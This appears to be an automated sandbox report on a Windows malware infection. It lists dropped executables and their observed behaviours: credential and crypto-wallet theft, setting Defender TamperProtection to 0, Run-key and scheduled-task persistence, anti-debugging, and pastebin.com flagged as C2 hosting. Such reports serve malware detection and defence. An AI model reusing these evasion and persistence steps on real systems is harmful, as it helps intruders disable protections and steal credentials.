N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\rvhetm\ktgtc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\ProgramData\rvhetm\ktgtc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\781a56e4da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110370101\\781a56e4da.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1109dfe086.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110380101\\1109dfe086.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e8635ad464.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\e8635ad464.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\351688018b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110350101\\351688018b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6dde3a1917.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110360101\\6dde3a1917.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\rvhetm\ktgtc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rvhetm\ktgtc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
